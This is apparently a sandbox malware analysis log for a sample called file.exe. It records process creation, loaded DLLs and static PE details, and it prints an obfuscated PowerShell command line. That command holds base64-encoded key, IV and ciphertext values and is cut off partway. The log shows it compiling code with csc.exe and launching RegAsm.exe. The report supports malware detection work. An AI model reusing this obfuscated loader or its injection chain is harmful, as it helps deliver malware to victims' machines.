Source: file.exe	String found in binary or memory: https://aka.ms/dotnet/infopath-to-application:Usage: dotnet [host-options] [path-to-application]host-options: The path to an application .dll file to execute. --list-sdks Display the installed SDKs --list-runtimes Display the installed runtimes -h\|--help Displays this help.Common Options:vector too long --info Display .NET information.unordered_map/set too longinvalid string positioninvalid hash bucket count--- Invoked %s [version: %s]hostfxr_main_bundle_startupinfohostfxr_main_startupinfoA fatal error occurred while processing application bundleInvalid startup info: host_path, dotnet_root, and app_path should not be null.get-native-search-directories.dev.jsonRuntime config is cfg=%s dev=%sHosting components are already initialized. Re-initialization to execute an app is not allowed..jsonIgnoring host interpreted additional probing path %s as it does not exist.Ignoring additional probing path %s as it does not exist.\|arch\|\\|tfm\|\|arch\|/\|tfm\|Specified runtimeconfig.json from [%s]Invalid runtimeconfig.json [%s] [%s]The specified runtimeconfig.json [%s] does not existApp runtimeconfig.json from [%s].runtimeconfig.jsonThe specified deps.json [%s] does not exist.deps.jsonDetecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d]DOTNET_ADDITIONAL_DEPSHOSTFXR_PATHInvalid value for command line argument '%s'It's invalid to use both '%s' and '%s' command line options.Executing as a %s app as per config file [%s]framework-dependentself-contained--list-runtimes-hUsing dotnet root path [%s]--list-sdks/?--info--help-?dotnet.dllUsing .NET SDK dll=[%s]The command could not be loaded, possibly because:
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet/infopath-to-application:Usage: dotnet [host-options] [path-to-application]host-options: The path to an application .dll file to execute. --list-sdks Display the installed SDKs --list-runtimes Display the installed runtimes -h\|--help Displays this help.Common Options:vector too long --info Display .NET information.unordered_map/set too longinvalid string positioninvalid hash bucket count--- Invoked %s [version: %s]hostfxr_main_bundle_startupinfohostfxr_main_startupinfoA fatal error occurred while processing application bundleInvalid startup info: host_path, dotnet_root, and app_path should not be null.get-native-search-directories.dev.jsonRuntime config is cfg=%s dev=%sHosting components are already initialized. Re-initialization to execute an app is not allowed..jsonIgnoring host interpreted additional probing path %s as it does not exist.Ignoring additional probing path %s as it does not exist.\|arch\|\\|tfm\|\|arch\|/\|tfm\|Specified runtimeconfig.json from [%s]Invalid runtimeconfig.json [%s] [%s]The specified runtimeconfig.json [%s] does not existApp runtimeconfig.json from [%s].runtimeconfig.jsonThe specified deps.json [%s] does not exist.deps.jsonDetecting mode... CoreCLR present in dotnet root [%s] and checking if [%s] file present=[%d]DOTNET_ADDITIONAL_DEPSHOSTFXR_PATHInvalid value for command line argument '%s'It's invalid to use both '%s' and '%s' command line options.Executing as a %s app as per config file [%s]framework-dependentself-contained--list-runtimes-hUsing dotnet root path [%s]--list-sdks/?--info--help-?dotnet.dllUsing .NET SDK dll=[%s]The command could not be loaded, possibly because:
Source: file.exe	String found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: file.exe	String found in binary or memory: ActivateActCtx failed. Error code: %d<A HREF="WindowsShell.ManifestCreateActCtxW failed using manifest '%s'. Error code: %dcomctl32.dllTaskDialogIndirect"></A>https://aka.ms/dotnet/app-launch-failed

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp" "c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt = 'RrQCwf6yfelfaItjSpP5Lem05xyCdtLsxmDjvXtJ1qg=' $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9 = '6IxK6qxMw723JyOLkLhRJQ==' $g3IdvVQ10UZ3mjgOOC4LurmdlMAGVKu1DWO8QDt8FRkfZgftPg9NTZzpg4rjVJFQ0yZ14IxKIwFcGHOF6GqfbgIeWZrmLKMwM3P1QOYHjYEVTVi9QmMPTZfjplFFRLzykJ0crmoShjwMclUyhR5Yxwcmo5b4ITq7ZGcKwFi3yu7932HE1GYzfaAn6doWKTKYtYn5IJCb = 'WbVnOuXFi5VdHFvlH8VLFLqCHp99aV7e98o0gKg8BrhdO82KvBRZpWVPfobXuKseH2pcy+l2TCyJfEhiDTSGGhJ2bJvrEd6Jn8YMDA6pagITIvCFAADHRiYf6jzMgSg3g8UJC89M0/qyyYaD5SUZY09/C7hNOKP6OpvYqwARJOWKpo0FJsUgtYh9Z0IZlTmfDQLMYRSBjoiyerwB+uMGBe9S1HbIS2rXnOPeWVFaU7p8cQ6Jxhs8X8AuEu9Yx+vBQ6OczGSU/bolI7fal5uBeBcaL8Sg53utSrbZM7gDvNtm0rtIDox3Ud/axb3HTk3OWmX9S1HPE4fRmPvy2+fvSsNEUCuaqkThljRKwYtzlgI=' function 9B0DZDTVY7CBvqsoFpdTRVTejJgFfbvSEm0dKxY3U1xdQI2C6y0T6jUMilTPXNgmbkwI0OdI1JypYgYagd8gLclW2NvYdIGGlLB5MTcRURsVk4nCXi9jfzazzagNTO5TDrENfsYVAQVukYbxZsBu8V1laB6bdZyFm8Ts0aX5UMjYdgPazjo0Nakg0SddWmjbSQHLFi6p ($MKO9YVaiER8NdDIeOBdsIqsAOI7oy0TeePaJbrja8LVAWCuoFU4f6lMWROWQolkdxt8Y2yCXSCUx4rfLNjidvdItCOrX62lm0iC235WHRHX31Pq09JCFDGiUkfVNGfrpR76mpMhiXbVnPe1mY1oV0fjUzihnJHAbQ8LujEbV1Ui1juEFN9pfq5ZcnLmG5t8Pak7g27DT, $keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt, $q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) { $56aVdDIumwbta7sLoc2IwkJ72HFX8E4RMzvhAXDXJjqZKpAkYwV2PYslVCt6xlWi1UhbcKK19FyNtkVdGWzchCBnGJWx37ZYXIxqHZINlvtK0esbgQZcmjAZSu42pMxBf9pkm55hMlqmIrX2RjRNHnceI87NufX8xs4qoHoKliZAsNR07CLFvkurwLcNyRm7YRpQV6dJ = [Convert]::FromBase64String($keaIuuYBVmghWL9Jc2UVEbVvdX4qcWLvjMmbPDVK4Z9haDGMPvLR3MrIRe5607YAblyJZxt8GKseCfW9QRagKu16WdUa8pjxA9FpFxnSBcLSUMGbTwPJwhpgT1oldTAQ0ve2963T4Sf8iIMI7iRb9aASjZ5eJBeicusZ7dBn3wfdCRyKOfOvBYgpuWjKApK2dwvnQnbt) $vG1ZYcluRGgs4SdNycud5aM4vscbYBEAYBKoS43U0iwrauCGdbRkcAdUux35AJ5QCf33Hou3I9NneWtBq5xmjTYYXpuWByTQMfou19yohobCnqg9D2f4Mi7iREFRu92KQxay6y9Q7IFuiWb7JWR8SoE4IFdV3guHV0lpPhCEsYxDcdAv38H9Rts1tGq1WNnqOy7S9lR2 = [Convert]::FromBase64String($q2uFwRaFdba9SUllJ9H7R4q8l3qzVYcg66pYaTf5bh3tTyxQzm7t05BWbVT31biPytDl5VKpubwaAwOm6az9qjQA43mOAMEAyOvZvLlcchyo91WfH6wqbIYPdCRB9wpi7vbmBorWpVxIk11DIHG3PNZqpgmstkCgsQQdp8dSfbBOLP4MaOs2pV2T6lwWCy1FTRQ4KnN9) $TNgurAr4Fhsv8Wq38UwIqaifbGpeFhViQfQEMxasPWWeUsStHEjPoIbi4BSlLNZXWKetFlQakEt4PEUiov6ByGtID7aLfogBwyTJOYoWnJ5jOH3ZgaxPgXZOQ6p7LEvvYr7QlK4ZHKNobKtwEK5Er0W89Eth9	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD8A4.tmp" "c:\Users\user\AppData\Local\Temp\uy2pimwz\CSCE5E1F75A70734430B929D7B25FACB84F.TMP"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 11134263 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x550a00
Source: file.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x13f400
Source: file.exe	Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x135c00

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Users\Administrator\source\repos\Increase\Increase\obj\Release\net8.0\win-x86\linked\Increase.pdbSHA256 source: file.exe
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\dlls\mscordac\mscordaccore.pdb source: file.exe
Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\uy2pimwz\uy2pimwz.pdb source: powershell.exe, 00000001.00000002.1735747000.000000000493A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\source\repos\Increase\Increase\obj\Release\net8.0\win-x86\linked\Increase.pdb source: file.exe
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb source: file.exe

Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Suspicious powershell command line found

